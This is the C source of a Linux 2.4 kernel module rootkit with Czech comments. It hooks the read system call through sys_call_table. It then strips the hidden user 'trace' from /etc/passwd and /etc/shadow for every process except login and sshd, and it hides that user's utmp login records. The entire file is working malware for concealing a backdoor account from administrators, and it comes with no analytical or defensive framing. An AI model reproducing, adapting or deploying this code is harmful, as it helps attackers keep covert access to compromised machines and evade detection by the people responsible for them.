/* 
 * 
 * writed for Linux - kernel 2.4.20 (Slackware 9.0) 
 *
 * 
 *	   	  		   	 -( trace@dump.cz )-
 */

#define MODULE
#define __KERNEL__

#include <linux/types.h>
#include <linux/module.h>
#include <linux/kernel.h>

#include <linux/proc_fs.h>
#include <sys/syscall.h>
#include <asm/uaccess.h>

#include <linux/errno.h>

#define PATCH(syscall)	\
	o_##syscall = sys_call_table[__NR_##syscall]; \
	sys_call_table[__NR_##syscall] = new_##syscall

#define RESTORE(syscall) (sys_call_table[__NR_##syscall] = o_##syscall)
	
#define INVISIBLE_UID		1000
#define INVISIBLE_USER		"trace"
	
extern void *sys_call_table[];

ssize_t (*o_read)(unsigned int, char *, size_t);

int remove_line(char *buffer, char *str)
{
	char *ptr = strstr(buffer, str);
	char *prev_line = ptr, *next_line = ptr;
	int rest_length = 0;
	int line_length = 0;
	
	if (ptr == NULL) return 0;
	
	while (prev_line > buffer && *prev_line != '\n') prev_line--;
	while (*next_line != 0 && *next_line != '\n') next_line++;

	line_length = next_line - prev_line;
	
	if (prev_line == ptr) next_line++;
	
	ptr = next_line;
	while (*(ptr++) != 0)
		rest_length++;

	while (next_line <= ptr)
		*(prev_line++) = *(next_line++);

	return line_length;
}

#define UT_LINESIZE	32
#define UT_NAMESIZE	32
#define UT_HOSTSIZE	256

struct exit_status {
    short int e_termination;	/* Process termination status.  */
    short int e_exit;			/* Process exit status.  */
};


struct utmp {
  short int ut_type;		/* Type of login.  */
  pid_t ut_pid;				/* Process ID of login process.  */
  char ut_line[UT_LINESIZE];	/* Devicename.  */
  char ut_id[4];			/* Inittab ID.  */
  char ut_user[UT_NAMESIZE];	/* Username.  */
  char ut_host[UT_HOSTSIZE];	/* Hostname for remote login.  */
  struct exit_status ut_exit;	/* Exit status of a process marked
								   as DEAD_PROCESS.  */
  long int ut_session;		/* Session ID, used for windowing.  */
  struct timeval ut_tv;		/* Time entry was made.  */
  int32_t ut_addr_v6[4];	/* Internet address of remote host.  */
  char __unused[20];		/* Reserved for future use.  */
};


asmlinkage ssize_t new_read(unsigned int fd, char *buf, size_t size) 
{
	ssize_t res = o_read(fd, buf, size);
	char filename[256] = {0};
	char buffer[4096] = {0};

	if (res <= 0) return -res;

	/* pro skryteho uzivatele nic skryto nebude */
	if (current && current->uid == INVISIBLE_UID) return res;
	
	copy_from_user(buffer, buf, sizeof(buffer));

	/* skryjeme zaznam v /etc/passwd a /etc/shadow */
	if (current && current->files && current->files->fd[fd]) {
		snprintf(filename, sizeof(filename), "%s", current->files->fd[fd]->f_dentry->d_name.name);
		if (strcmp(current->comm, "login") && strcmp(current->comm, "sshd") && 
			(!strcmp(filename, "passwd") || !strcmp(filename, "shadow")))
		{
			if (strstr(buffer, INVISIBLE_USER)) {
				res -= remove_line(buffer, INVISIBLE_USER);	
				copy_to_user(buf, buffer, sizeof(buffer));
			}
		}
	}
	
	/* skryjeme zaznam v utmp */	
	if (!strcmp(filename, "utmp")) {
		struct utmp *utmp_entry = (struct utmp *) buffer;
		if (utmp_entry != NULL && !strcmp(utmp_entry->ut_user, INVISIBLE_USER))
			return 0;
	}

	return res;
}


int init_module() 
{
	PATCH(read);
	return 0;
}

void cleanup_module()
{
	RESTORE(read);
}

MODULE_LICENSE("GPL");

